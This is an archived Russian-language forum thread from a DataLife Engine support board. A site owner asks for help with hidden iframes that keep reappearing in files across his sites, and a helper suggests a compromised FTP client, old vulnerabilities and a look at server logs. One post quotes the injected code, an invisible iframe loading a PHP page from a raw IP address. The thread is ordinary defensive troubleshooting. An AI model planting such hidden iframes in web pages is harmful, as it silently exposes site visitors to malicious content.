sunca 0 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 Несколько недельназад пролези фреймы на все сайты как дле так и на других движках, поубирал... сейчас снова сидят, что можно придумать? (Пароли менять не предлогаем) На дле вообще ужас прописываются и в mail index inc data файлов в 10-15... Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1161 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 Если ваша тема начинается с вопроса и вам нужна какая либо помощь, то в самой теме в обязательном порядке вы должны указывать ссылку на ваш сайт. Если ваш сайт находится в локальной сети и вы не можете предоставить ссылку, или вы не хотите публиковать открытой ссылки на ваш сайт, то отправляйте персональное сообщение с вопросом в службу поддержки непосредственно с сайта http://dle-news.ru/, вам ответят на ваш вопрос в персональном порядке, в случае если пользуетесь платной версией скрипта и обладаете лицензией на скрипт. Если вы пользуетесь демоверсией, то вам необходимо разместить сайт в сети интернет, и только потом обращаться за помощью. По находящимся на локальных компьютерах демоверсиям никакой помощи и поддержки на форуме не оказывается. Если вы не указали сайт, то ваша тема будет закрыта, а аккаунт на форуме заблокирован. Ссылка на сообщение Поделиться на других сайтах
sunca 0 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 Автор Если ваша тема начинается с вопроса и вам нужна какая либо помощь, то в самой теме в обязательном порядке вы должны указывать ссылку на ваш сайт. Если ваш сайт находится в локальной сети и вы не можете предоставить ссылку, или вы не хотите публиковать открытой ссылки на ваш сайт, то отправляйте персональное сообщение с вопросом в службу поддержки непосредственно с сайта http://dle-news.ru/, вам ответят на ваш вопрос в персональном порядке, в случае если пользуетесь платной версией скрипта и обладаете лицензией на скрипт. Если вы пользуетесь демоверсией, то вам необходимо разместить сайт в сети интернет, и только потом обращаться за помощью. По находящимся на локальных компьютерах демоверсиям никакой помощи и поддержки на форуме не оказывается. Если вы не указали сайт, то ваша тема будет закрыта, а аккаунт на форуме заблокирован. один из сайтов endem.ru Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1161 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 Не нашел я iframe на этом сайте Ссылка на сообщение Поделиться на других сайтах
sunca 0 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 Автор Не нашел я iframe на этом сайте да тут я уже убрал и ещё на 3-х вот только как понять гже дыра чтобы больше не пришлось.... Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1161 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 Дырка может быть где угодно. Например, заражен Ваш FTP клиент. Когда Вы заходите на сервер по протоколу FTP, то он начинает вносить изменения в файлы типа index.html и index.php и так далее. Смотрите логи сервера. Или кто-то мог получить доступ к Вашему серверу через старые уязвимости, которые у Вас могли быть, и до сих пор пользуется. Какая у Вас версия DLE? Ссылка на сообщение Поделиться на других сайтах
sunca 0 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 Автор Дырка может быть где угодно. Например, заражен Ваш FTP клиент. Когда Вы заходите на сервер по протоколу FTP, то он начинает вносить изменения в файлы типа index.html и index.php и так далее. Смотрите логи сервера. Или кто-то мог получить доступ к Вашему серверу через старые уязвимости, которые у Вас могли быть, и до сих пор пользуется. Какая у Вас версия DLE? Думаю вы правы так как не только сайты на DLE были поражены, а вы не могли бы подсказать где эти логи найти можно? Версия 9.2 разумеется. Вот вид фрейма кстати <iframe width="468" height="60" src="нттп://195.14.112.168/124.php" style="top:0px; position:relative; border:0px; right:-550px; opacity:0; -moz-opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0)"></iframe> Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1161 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 /var/logСмотря, конечно, как у Вас всё настроено Ссылка на сообщение Поделиться на других сайтах
sunca 0 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 Автор /var/log Смотря, конечно, как у Вас всё настроено думаю в никс врядли смогли бы пролезть. я думал вы имеете в виду что "winдовый" filezilla клиент содержит уязвимость при подключению к серверу... Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1161 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 я думал вы имеете в виду что "winдовый" filezilla клиент содержит уязвимость при подключению к серверу...Правильно думали. Проверьте компьютер на вирусы. А логи на сервере тоже надо смотреть. Вдруг сможете понять человек это делает или какой-то скрипт Ссылка на сообщение Поделиться на других сайтах
sunca 0 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 Автор я думал вы имеете в виду что "winдовый" filezilla клиент содержит уязвимость при подключению к серверу...Правильно думали. Проверьте компьютер на вирусы. А логи на сервере тоже надо смотреть. Вдруг сможете понять человек это делает или какой-то скрипт звучит это все же как найти иголку в стоге... Очень уверен что антивирус тут врядли может чем помочь, ведь вредоносного когда никакого и нет по сути как для антивирусной коалиции... Было бы не плохо увидеть реально возможные закаулки для этого кода. Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Архивировано
Эта тема находится в архиве и закрыта для публикации сообщений.